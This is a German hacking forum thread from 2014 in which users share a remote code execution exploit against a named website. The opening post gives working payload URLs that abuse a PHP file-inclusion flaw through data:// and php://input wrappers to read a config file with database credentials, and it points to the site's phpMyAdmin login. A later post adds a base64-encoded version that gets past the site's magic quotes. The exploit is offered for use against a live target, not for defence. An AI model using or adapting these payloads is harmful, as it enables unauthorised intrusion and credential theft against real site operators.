Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

thesums.de - Remote Code Execution

- - - - -
Erstellt von Zero-X ,

  • Bitte melde dich an um zu Antworten
4 Antworten in diesem Thema

#1
Zero-X
Geschrieben 04 October 2014 - 14:38 Uhr

Zero-X

    FTB Experte

  • Premium Member
    • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux
Eingabe:
http://thesums.de/seite/index.php?inc=data://text/plain,<? readfile("../mysqldumper/config.php"); ?>

oder:
http://thesums.de/seite/index.php?inc=php://input
und mit einem beliebigen Tool wie Live HTTP Headers oder dem Telnet-Clienten ein POST Request mit PHP-Code senden.

phpMyAdmin Login:
http://thesums.de/mysqladmin/
Login-Daten sind in der config.php

#2
ProHex
Geschrieben 04 October 2014 - 17:20 Uhr

ProHex

    Hacker

  • Moderator
    • Likes
    212
  • 219 Beiträge
  • 185 Bedankt
ich bekomm folgenden fehler:

Warning: Unexpected character in input: '' (ASCII=92) state=1 in data://text/html, on line 1

ist das nicht schon fixed?

#3
Zero-X
Geschrieben 05 October 2014 - 12:19 Uhr

Zero-X

    FTB Experte

  • Premium Member
    • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux
Anscheinend haben die jetzt Magic Quotes aktiviert.

So funktioniert es noch:
http://thesums.de/seite/index.php?inc=data://text/plain;base64,PD8gcmVhZGZpbGUoIi4uL215c3FsZHVtcGVyL2NvbmZpZy5waHAiKTsgPz4=

Das ist genau das selbe wie oben, nur ist der Code jetzt in Base64 codiert.

#4
pdr0
Geschrieben 05 October 2014 - 13:01 Uhr

pdr0

    Pentester

  • Premium Member
    • Likes
    86
  • 148 Beiträge
  • 87 Bedankt
Wie sieht die Luecke bei denen im Code aus? Es ist bestimmt kein einfaches include($_GET["inc"]);

#5
Zero-X
Geschrieben 05 October 2014 - 13:37 Uhr

Zero-X

    FTB Experte

  • Premium Member
    • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux
Vom Code her ist es eine klassische Remote File Inclusion. Wenn man aber hinter "inc" etwas mit http:// oder https:// schreibt, gibt der Webserver die Fehlermeldung "403 Forbidden" aus.
php:// oder data:// nimmt er aber an.
Zurück zu  Classic Hacking

  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 37 user(s)


    , 3eyes, B1nary, Bad Grandpa, BlackZetsu, blue_eyed_devil, Bus1ness Junkie, Ch!ller, connecting, cooky1, corkscrew, Cube, CyberFlash, D3r0ma, Dr. Spic, easysurfer, Eester, FalkE, FatalityMods, Framerater, FullMetall, gutzuu, Laggy, lion., most_uniQue, paulaner, pdr0, ProHex, smc2014, Streetboz, Tortschi, Twix2010, will, Xenio, xFAUSTx, XoiL, Zero-X
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.  Classic Hacking